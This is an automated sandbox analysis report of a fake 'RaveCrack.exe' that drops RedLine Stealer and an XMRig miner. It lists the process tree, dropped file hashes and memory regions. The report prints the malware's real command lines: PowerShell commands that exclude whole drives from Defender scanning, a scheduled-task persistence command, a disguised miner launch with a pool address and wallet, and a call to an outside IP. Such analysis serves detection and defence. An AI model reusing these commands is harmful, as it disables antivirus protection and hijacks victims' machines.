Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
05-12-2021 20:29
General
-
Target
RaveCrack.exe
-
Size
1.6MB
-
MD5
92072e1401c170181f26fc193ae6137f
-
SHA1
bcbeeca2346809882369655c85d9ffb9c2b2aadf
-
SHA256
29c409e07f6bff407c11023eae2d2bb2a9033e44fbb4a07897a785f5ae1c3d24
-
SHA512
6dd5ad7d456a77ae001b07e5cefba80553498e13bf3e2dc5b9c3de722ac37d9b0d1518004371cb1d4bed51e3b2dcc7590c5d970cc78fa8f7864c341c45aa8a2b
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 11 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
-
Modifies Installed Components in the registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 11 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 8 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 44 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of FindShellTrayWindow 33 IoCs
-
Suspicious use of SendNotifyMessage 32 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RaveCrack.exe"C:\Users\Admin\AppData\Local\Temp\RaveCrack.exe"1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 924 -s 5643⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Java.exe"C:\Users\Admin\AppData\Local\Temp\Java.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\svchost.exeC:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14444 --user=41zSmpNwAfHBxUh8HTq7Fsj2TXsGboB8GFeM8ek7xhc8QmL1TJCmoam94f57niQhKqiajN7KMWmAng1cNnMghXPi5bN3xNk.{COMPUTERNAME}/adwadw --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/lwH5kWp3uPfR1kinOL+sIQ==" --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Windows.exe"C:\Users\Admin\AppData\Local\Temp\Windows.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ctfmon.exectfmon.exe4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Eliza 185.237.99.19 1339 dCeUemjhL3⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x21c1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Java.exeMD5
76c9006939b45a328a5187264ba21dac
SHA16278c21bd14dfd7cf5b6c86a051265fa846f6fe0
SHA256993091a0549a9d4d793d31906dee2b5f2e52beb394018312064b263981181f5c
SHA5124894dab07b00e067cc5e246d3aefabff2a551ad3420da4bc4baa333b9d6169fd28762e8997d50e9b0bfde79243e0ecf4b79ad9a16bbf2e4cb7a049712648ea8e
-
C:\Users\Admin\AppData\Local\Temp\Java.exeMD5
76c9006939b45a328a5187264ba21dac
SHA16278c21bd14dfd7cf5b6c86a051265fa846f6fe0
SHA256993091a0549a9d4d793d31906dee2b5f2e52beb394018312064b263981181f5c
SHA5124894dab07b00e067cc5e246d3aefabff2a551ad3420da4bc4baa333b9d6169fd28762e8997d50e9b0bfde79243e0ecf4b79ad9a16bbf2e4cb7a049712648ea8e
-
C:\Users\Admin\AppData\Local\Temp\Windows.exeMD5
04323065620b2b948a0c4c7f0824342f
SHA1409971226295c3a0eeb3282584fd07de0f238c0d
SHA25640ec87517eb87cbac27db58ee2c79eb0730c919a4dc6ba4e55882f0cc7aa4843
SHA51234fe31132ee740f857f1622c355938bad2871465e6275fde45309fa99b5013d53e5a3343e7dea519ac0a089802c522fc3a937354a982aaa04d0faf4e925d7fbc
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
d7f605b6448b78cf4854b87fc81ab83f
SHA1e75fb49bd60755f29b6dd42284844fcfdf4e172e
SHA256a7c31ed8a641a36a451cb604ca569efa74c066a9d917df27e3e592758591ceac
SHA512c5cb4e9bb1ef412857957ce6dc7bf735db6fc29859f3dee5b2122c5bc89da7c0c4569e44ee27b7596c723644c9a88ab4b2cf4a52232e08c4578b316967e9b3c4
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
d7f605b6448b78cf4854b87fc81ab83f
SHA1e75fb49bd60755f29b6dd42284844fcfdf4e172e
SHA256a7c31ed8a641a36a451cb604ca569efa74c066a9d917df27e3e592758591ceac
SHA512c5cb4e9bb1ef412857957ce6dc7bf735db6fc29859f3dee5b2122c5bc89da7c0c4569e44ee27b7596c723644c9a88ab4b2cf4a52232e08c4578b316967e9b3c4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
b42303693cf1ffd6c7b2945ecb826367
SHA1a427d3187494d0cbfa70f990f91f31c42f571434
SHA2569f24e862fa435f7b5b6a5e4e5404d68b07c73012ee8173fe60044f3a0ba81c7f
SHA5128398f73db1cdd06cdbe1fcbc2759e9cd73d58330902c3f8c6ba3989b368ce61e4347e6cbbfe840ab0f8b0638e215a74908a1243db85052745f68be5cc16ea9a6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
b42303693cf1ffd6c7b2945ecb826367
SHA1a427d3187494d0cbfa70f990f91f31c42f571434
SHA2569f24e862fa435f7b5b6a5e4e5404d68b07c73012ee8173fe60044f3a0ba81c7f
SHA5128398f73db1cdd06cdbe1fcbc2759e9cd73d58330902c3f8c6ba3989b368ce61e4347e6cbbfe840ab0f8b0638e215a74908a1243db85052745f68be5cc16ea9a6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
93e37040c6b42c0f6a3976442fec4ae2
SHA16fd459eff82de133e3b528e97525e806ec3cdc2d
SHA256ffdda297de0d7c89c31356c7d19b3f3b7e0f533a6be90d0a8636c9e8d8efaec1
SHA5126637e3d173033473262088c7f9c0d260c532603ca8f12c33f5a09b3174b33bfefe21b7ec12170096d75411353f94fa9ade582cd7afb19eb4421d933c70053193
-
C:\Windows\System32\Microsoft\Libs\sihost64.exeMD5
47a096508b7341c02ad9dea2ae1bff65
SHA1af3d9f459e011b6abbab999aa64885316149c50e
SHA256defe2466f3885a0f25c09e35e5a51f837b534eae1ee8b8ad68c6b02bb8ebc875
SHA5125959f95a08c0a2798187905d2c9c08b18a6d3d6d1276a80849ff6d203687836818a77952adcc5b6a6ec16bcbe30a899f0aecbd402d9e04bb90a69beb37d1cd4d
-
C:\Windows\System32\services64.exeMD5
76c9006939b45a328a5187264ba21dac
SHA16278c21bd14dfd7cf5b6c86a051265fa846f6fe0
SHA256993091a0549a9d4d793d31906dee2b5f2e52beb394018312064b263981181f5c
SHA5124894dab07b00e067cc5e246d3aefabff2a551ad3420da4bc4baa333b9d6169fd28762e8997d50e9b0bfde79243e0ecf4b79ad9a16bbf2e4cb7a049712648ea8e
-
C:\Windows\system32\Microsoft\Libs\sihost64.exeMD5
47a096508b7341c02ad9dea2ae1bff65
SHA1af3d9f459e011b6abbab999aa64885316149c50e
SHA256defe2466f3885a0f25c09e35e5a51f837b534eae1ee8b8ad68c6b02bb8ebc875
SHA5125959f95a08c0a2798187905d2c9c08b18a6d3d6d1276a80849ff6d203687836818a77952adcc5b6a6ec16bcbe30a899f0aecbd402d9e04bb90a69beb37d1cd4d
-
C:\Windows\system32\services64.exeMD5
76c9006939b45a328a5187264ba21dac
SHA16278c21bd14dfd7cf5b6c86a051265fa846f6fe0
SHA256993091a0549a9d4d793d31906dee2b5f2e52beb394018312064b263981181f5c
SHA5124894dab07b00e067cc5e246d3aefabff2a551ad3420da4bc4baa333b9d6169fd28762e8997d50e9b0bfde79243e0ecf4b79ad9a16bbf2e4cb7a049712648ea8e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\Java.exeMD5
76c9006939b45a328a5187264ba21dac
SHA16278c21bd14dfd7cf5b6c86a051265fa846f6fe0
SHA256993091a0549a9d4d793d31906dee2b5f2e52beb394018312064b263981181f5c
SHA5124894dab07b00e067cc5e246d3aefabff2a551ad3420da4bc4baa333b9d6169fd28762e8997d50e9b0bfde79243e0ecf4b79ad9a16bbf2e4cb7a049712648ea8e
-
\Users\Admin\AppData\Local\Temp\Windows.exeMD5
04323065620b2b948a0c4c7f0824342f
SHA1409971226295c3a0eeb3282584fd07de0f238c0d
SHA25640ec87517eb87cbac27db58ee2c79eb0730c919a4dc6ba4e55882f0cc7aa4843
SHA51234fe31132ee740f857f1622c355938bad2871465e6275fde45309fa99b5013d53e5a3343e7dea519ac0a089802c522fc3a937354a982aaa04d0faf4e925d7fbc
-
\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
d7f605b6448b78cf4854b87fc81ab83f
SHA1e75fb49bd60755f29b6dd42284844fcfdf4e172e
SHA256a7c31ed8a641a36a451cb604ca569efa74c066a9d917df27e3e592758591ceac
SHA512c5cb4e9bb1ef412857957ce6dc7bf735db6fc29859f3dee5b2122c5bc89da7c0c4569e44ee27b7596c723644c9a88ab4b2cf4a52232e08c4578b316967e9b3c4
-
\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
d7f605b6448b78cf4854b87fc81ab83f
SHA1e75fb49bd60755f29b6dd42284844fcfdf4e172e
SHA256a7c31ed8a641a36a451cb604ca569efa74c066a9d917df27e3e592758591ceac
SHA512c5cb4e9bb1ef412857957ce6dc7bf735db6fc29859f3dee5b2122c5bc89da7c0c4569e44ee27b7596c723644c9a88ab4b2cf4a52232e08c4578b316967e9b3c4
-
\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
d7f605b6448b78cf4854b87fc81ab83f
SHA1e75fb49bd60755f29b6dd42284844fcfdf4e172e
SHA256a7c31ed8a641a36a451cb604ca569efa74c066a9d917df27e3e592758591ceac
SHA512c5cb4e9bb1ef412857957ce6dc7bf735db6fc29859f3dee5b2122c5bc89da7c0c4569e44ee27b7596c723644c9a88ab4b2cf4a52232e08c4578b316967e9b3c4
-
\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
d7f605b6448b78cf4854b87fc81ab83f
SHA1e75fb49bd60755f29b6dd42284844fcfdf4e172e
SHA256a7c31ed8a641a36a451cb604ca569efa74c066a9d917df27e3e592758591ceac
SHA512c5cb4e9bb1ef412857957ce6dc7bf735db6fc29859f3dee5b2122c5bc89da7c0c4569e44ee27b7596c723644c9a88ab4b2cf4a52232e08c4578b316967e9b3c4
-
\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
d7f605b6448b78cf4854b87fc81ab83f
SHA1e75fb49bd60755f29b6dd42284844fcfdf4e172e
SHA256a7c31ed8a641a36a451cb604ca569efa74c066a9d917df27e3e592758591ceac
SHA512c5cb4e9bb1ef412857957ce6dc7bf735db6fc29859f3dee5b2122c5bc89da7c0c4569e44ee27b7596c723644c9a88ab4b2cf4a52232e08c4578b316967e9b3c4
-
\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
d7f605b6448b78cf4854b87fc81ab83f
SHA1e75fb49bd60755f29b6dd42284844fcfdf4e172e
SHA256a7c31ed8a641a36a451cb604ca569efa74c066a9d917df27e3e592758591ceac
SHA512c5cb4e9bb1ef412857957ce6dc7bf735db6fc29859f3dee5b2122c5bc89da7c0c4569e44ee27b7596c723644c9a88ab4b2cf4a52232e08c4578b316967e9b3c4
-
\Users\Admin\AppData\Local\Temp\WindowsDefender.exeMD5
d7f605b6448b78cf4854b87fc81ab83f
SHA1e75fb49bd60755f29b6dd42284844fcfdf4e172e
SHA256a7c31ed8a641a36a451cb604ca569efa74c066a9d917df27e3e592758591ceac
SHA512c5cb4e9bb1ef412857957ce6dc7bf735db6fc29859f3dee5b2122c5bc89da7c0c4569e44ee27b7596c723644c9a88ab4b2cf4a52232e08c4578b316967e9b3c4
-
\Windows\System32\Microsoft\Libs\sihost64.exeMD5
47a096508b7341c02ad9dea2ae1bff65
SHA1af3d9f459e011b6abbab999aa64885316149c50e
SHA256defe2466f3885a0f25c09e35e5a51f837b534eae1ee8b8ad68c6b02bb8ebc875
SHA5125959f95a08c0a2798187905d2c9c08b18a6d3d6d1276a80849ff6d203687836818a77952adcc5b6a6ec16bcbe30a899f0aecbd402d9e04bb90a69beb37d1cd4d
-
\Windows\System32\services64.exeMD5
76c9006939b45a328a5187264ba21dac
SHA16278c21bd14dfd7cf5b6c86a051265fa846f6fe0
SHA256993091a0549a9d4d793d31906dee2b5f2e52beb394018312064b263981181f5c
SHA5124894dab07b00e067cc5e246d3aefabff2a551ad3420da4bc4baa333b9d6169fd28762e8997d50e9b0bfde79243e0ecf4b79ad9a16bbf2e4cb7a049712648ea8e
-
memory/300-204-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-214-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-217-0x000000014030F3F8-mapping.dmp
-
memory/300-218-0x00000000000E0000-0x0000000000100000-memory.dmpFilesize
128KB
-
memory/300-216-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-215-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-213-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-212-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-211-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-210-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-205-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-209-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-208-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-206-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/300-207-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/308-138-0x0000000000000000-mapping.dmp
-
memory/592-170-0x0000000000000000-mapping.dmp
-
memory/620-165-0x0000000000000000-mapping.dmp
-
memory/836-177-0x0000000000000000-mapping.dmp
-
memory/924-110-0x0000000000000000-mapping.dmp
-
memory/924-122-0x000000001C670000-0x000000001C9F6000-memory.dmpFilesize
3.5MB
-
memory/924-113-0x0000000000A30000-0x0000000000A31000-memory.dmpFilesize
4KB
-
memory/1000-176-0x000007FEEC760000-0x000007FEED2BD000-memory.dmpFilesize
11.4MB
-
memory/1000-173-0x0000000000000000-mapping.dmp
-
memory/1000-184-0x000000001B7C0000-0x000000001BABF000-memory.dmpFilesize
3.0MB
-
memory/1060-119-0x000000013FEA0000-0x000000013FEA1000-memory.dmpFilesize
4KB
-
memory/1060-121-0x000000001C260000-0x000000001C47E000-memory.dmpFilesize
2.1MB
-
memory/1060-116-0x0000000000000000-mapping.dmp
-
memory/1080-131-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmpFilesize
8KB
-
memory/1080-130-0x0000000000000000-mapping.dmp
-
memory/1136-186-0x0000000000000000-mapping.dmp
-
memory/1324-157-0x0000000000000000-mapping.dmp
-
memory/1368-191-0x000007FEEC760000-0x000007FEED2BD000-memory.dmpFilesize
11.4MB
-
memory/1368-187-0x0000000000000000-mapping.dmp
-
memory/1412-198-0x0000000000000000-mapping.dmp
-
memory/1412-202-0x000007FEEAA00000-0x000007FEEB55D000-memory.dmpFilesize
11.4MB
-
memory/1412-203-0x000000001B810000-0x000000001BB0F000-memory.dmpFilesize
3.0MB
-
memory/1480-134-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1480-162-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1480-132-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1480-137-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1480-136-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1480-140-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1480-143-0x00000000004101AE-mapping.dmp
-
memory/1532-193-0x0000000000000000-mapping.dmp
-
memory/1532-196-0x000000013FA50000-0x000000013FA51000-memory.dmpFilesize
4KB
-
memory/1532-199-0x0000000000640000-0x0000000000641000-memory.dmpFilesize
4KB
-
memory/1544-171-0x0000000000000000-mapping.dmp
-
memory/1568-167-0x0000000000000000-mapping.dmp
-
memory/1568-169-0x000007FEEC760000-0x000007FEED2BD000-memory.dmpFilesize
11.4MB
-
memory/1568-172-0x000000001B6F0000-0x000000001B9EF000-memory.dmpFilesize
3.0MB
-
memory/1588-153-0x0000000000830000-0x0000000000831000-memory.dmpFilesize
4KB
-
memory/1588-128-0x0000000000400000-0x0000000000402000-memory.dmpFilesize
8KB
-
memory/1588-139-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1588-135-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1588-133-0x00000000034D0000-0x00000000034D1000-memory.dmpFilesize
4KB
-
memory/1588-141-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1588-124-0x0000000000000000-mapping.dmp
-
memory/1588-154-0x0000000000830000-0x0000000000831000-memory.dmpFilesize
4KB
-
memory/1588-127-0x0000000000400000-0x00000000007FC000-memory.dmpFilesize
4.0MB
-
memory/1588-152-0x0000000000830000-0x0000000000831000-memory.dmpFilesize
4KB
-
memory/1588-151-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1588-150-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1588-149-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1588-148-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1588-146-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1588-147-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1588-145-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1588-144-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1820-87-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1820-78-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1820-101-0x00000000028D0000-0x00000000028D1000-memory.dmpFilesize
4KB
-
memory/1820-98-0x00000000028E0000-0x00000000028E1000-memory.dmpFilesize
4KB
-
memory/1820-95-0x00000000028C0000-0x00000000028C1000-memory.dmpFilesize
4KB
-
memory/1820-96-0x0000000002880000-0x0000000002881000-memory.dmpFilesize
4KB
-
memory/1820-94-0x0000000002850000-0x0000000002851000-memory.dmpFilesize
4KB
-
memory/1820-93-0x00000000028A0000-0x00000000028A1000-memory.dmpFilesize
4KB
-
memory/1820-91-0x0000000000B30000-0x0000000000B31000-memory.dmpFilesize
4KB
-
memory/1820-100-0x0000000000B30000-0x0000000000B31000-memory.dmpFilesize
4KB
-
memory/1820-92-0x0000000002890000-0x0000000002891000-memory.dmpFilesize
4KB
-
memory/1820-107-0x0000000005A30000-0x0000000005A31000-memory.dmpFilesize
4KB
-
memory/1820-102-0x0000000002630000-0x0000000002631000-memory.dmpFilesize
4KB
-
memory/1820-55-0x00000000757E1000-0x00000000757E3000-memory.dmpFilesize
8KB
-
memory/1820-90-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1820-89-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1820-88-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1820-99-0x0000000000B30000-0x0000000000B31000-memory.dmpFilesize
4KB
-
memory/1820-57-0x00000000027E0000-0x00000000027E1000-memory.dmpFilesize
4KB
-
memory/1820-86-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1820-56-0x00000000008D0000-0x0000000000930000-memory.dmpFilesize
384KB
-
memory/1820-83-0x0000000002720000-0x0000000002721000-memory.dmpFilesize
4KB
-
memory/1820-84-0x0000000002710000-0x0000000002711000-memory.dmpFilesize
4KB
-
memory/1820-85-0x0000000002780000-0x0000000002781000-memory.dmpFilesize
4KB
-
memory/1820-81-0x00000000026F0000-0x00000000026F1000-memory.dmpFilesize
4KB
-
memory/1820-82-0x0000000002760000-0x0000000002761000-memory.dmpFilesize
4KB
-
memory/1820-80-0x0000000002740000-0x0000000002741000-memory.dmpFilesize
4KB
-
memory/1820-97-0x0000000002870000-0x0000000002871000-memory.dmpFilesize
4KB
-
memory/1820-79-0x0000000002730000-0x0000000002731000-memory.dmpFilesize
4KB
-
memory/1820-77-0x00000000034C0000-0x00000000034C1000-memory.dmpFilesize
4KB
-
memory/1820-103-0x0000000000B30000-0x0000000000B31000-memory.dmpFilesize
4KB
-
memory/1820-104-0x0000000000B30000-0x0000000000B31000-memory.dmpFilesize
4KB
-
memory/1820-76-0x0000000002620000-0x0000000002621000-memory.dmpFilesize
4KB
-
memory/1820-75-0x0000000002600000-0x0000000002601000-memory.dmpFilesize
4KB
-
